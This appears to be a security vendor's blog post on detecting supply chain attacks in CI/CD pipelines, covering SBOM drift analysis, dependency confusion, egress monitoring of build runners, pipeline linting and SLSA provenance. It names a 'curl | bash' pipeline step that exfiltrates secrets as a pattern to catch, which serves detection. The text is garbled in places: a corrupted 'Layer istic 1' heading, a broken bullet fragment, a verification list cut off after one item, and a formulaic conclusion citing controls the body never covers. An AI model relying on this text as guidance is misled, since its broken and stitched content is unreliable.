Back to Blog

Detecting Supply Chain Attacks in CI/CD Pipelines

Detecting Supply Chain Attacks in CI/CD Pipelines

The security perimeter has fundamentally shifted. For decades, the industry focused on hardening the network edge-firewalls, WAFs, and intrusion detection systems. However, as organizations moved toward DevOps and automated delivery, the "edge" dissolved into a complex web of interconnected dependencies, automated build agents, and ephemeral infrastructure.

The CI/CD pipeline is now the high-value target. Unlike a traditional breach where an attacker seeks to exfiltrate data from a database, a supply chain attack seeks to inject malicious logic into the software itself. If an attacker can compromise a build script, a container base image, or a third-party library, they inherit the trust already granted to your deployment process. Detecting these attacks requires moving beyond simple vulnerability scanning and toward a rigorous model of integrity verification across the entire software lifecycle.

The Anatomy of a Pipeline Compromise

To detect an attack, we must first categorize the vectors. Supply chain attacks in CI/CD generally fall into three architectural layers:

  1. Input Poisoning (Dependency Attacks): Malicious code introduced via external libraries, transitive dependencies, or "dependency confusion" attacks.
  2. Process Tampering (Build Environment Attacks): Unauthorized modifications to the build instructions (e.g., `Jenkinsfile`, `.github/workflows`), compromised build runners, or poisoned container images used as build environments.
  3. Output Manipulation (Artifact Attacks): Tampering with the compiled binaries, container images, or configuration files after they have been built but before they are signed or deployed.

Layer istic 1: Detecting Input Poisoning

The most common attack vector is the dependency. Attackers exploit the automated nature of package managers (NPM, PyPI, Maven) to inject malicious code.

Software Bill of Materials (SBOM) and Drift Analysis

Detection begins with visibility. You cannot detect what you cannot see. Implementing an automated SBOM generation step-using tools like Syft or CycloneDX-is critical. However, an SBOM is only useful if it is used for drift analysis.

By comparing the SBOM of a new build against a "known-good" baseline from a previous stable release, you can programmatically detect the introduction of new, unvetted transitive dependencies. An alert should trigger if a build introduces a package that has no previous history in your ecosystem or originates from an untrusted registry.

Detecting Dependency Confusion

Dependency confusion occurs when an attacker publishes a package to a public registry with the same name as an internal, private package but with a higher version number. To detect this, your CI/CD pipeline must implement namespace shadowing detection. This involves auditing your package manager configuration to ensure that internal scopes (e.g., `@company-internal/`) are explicitly routed to private registries and never allowed to fall back to public mirrors.

Layer 2: Detecting Process Tampering

The build runner is a transient but highly privileged execution environment. If an attacker gains access to a runner, they can modify the build logic to inject a backdoor into the final artifact without changing a single line of source code in your Git repository.

Network Egress Monitoring

A hallmark of a compromised build process is unauthorized communication. A build script's primary job is to compile code and move artifacts. It rarely needs to communicate with unknown IP addresses or non-whitelisted domains.

Implementing egress filtering and monitoring on your build agents is one of the most effective detection strategies. By using tools like eBPF-based agents (e.g., Cilium or Tetragon), you can monitor the system calls of your build processes. If a `gcc` or `npm install` process suddenly attempts to initiate an outbound connection to a suspicious C2 (Command and Control) server, the pipeline should be immediately aborted and flagged for investigation.

Infrastructure as Code (IaC) and Pipeline Linting

Attackers often target the pipeline definition itself. A subtle change to a `.github/workflows/build.yml` file might add a single `curl | bash` command that exfiltrates secrets.

Detection requires continuous auditing of your pipeline-as-code. Implementing automated linting and policy enforcement (using Open Policy Agent/Rego) can prevent the deployment of pipelines that contain dangerous patterns, such as:

  • Use of `shell: bash` with unquoted variables.

able to execute arbitrary commands.

  • Lack of pinned versions for build actions or Docker images.

Layer 3: Detecting Output Manipulation

The final stage of an attack is ensuring the malicious artifact reaches production. If the build process is compromised, the resulting artifact is "poisoned" despite the source code being clean.

Implementing the SLSA Framework

To detect manipulation, you must implement the SLSA (Supply-chain Levels for Software Artifacts) framework. The goal is to move toward "Level 3" or "Level 4" compliance, which requires provenance.

Provenance is a verifiable record of how an artifact was built. It includes the build platform, the source repository, and the specific commit SHA. Using tools like Sigstore/Cosign, you can cryptographically sign your artifacts and their associated metadata.

Detection in this layer happens at the admission control stage. In a Kubernetes environment, an admission controller (like Kyverno) should intercept every deployment request. It should verify:

  1. Is the image signed by our trusted build pipeline?

Conclusion

As shown across "The Anatomy of a Pipeline Compromise", "Layer istic 1: Detecting Input Poisoning", "Layer 2: Detecting Process Tampering", a secure implementation for detecting supply chain attacks in ci/cd pipelines depends on execution discipline as much as design.

The practical hardening path is to enforce admission-policy enforcement plus workload isolation and network policy controls, certificate lifecycle governance with strict chain/revocation checks, and behavior-chain detection across process, memory, identity, and network telemetry. This combination reduces both exploitability and attacker dwell time by forcing failures across multiple independent control layers.

Operational confidence should be measured, not assumed: track mean time to detect and remediate configuration drift and policy-gate coverage and vulnerable artifact escape rate, then use those results to tune preventive policy, detection fidelity, and response runbooks on a fixed review cadence.

Related Articles

Explore related cybersecurity topics:

Recommended Next Steps

If this topic is relevant to your organisation, use one of these paths: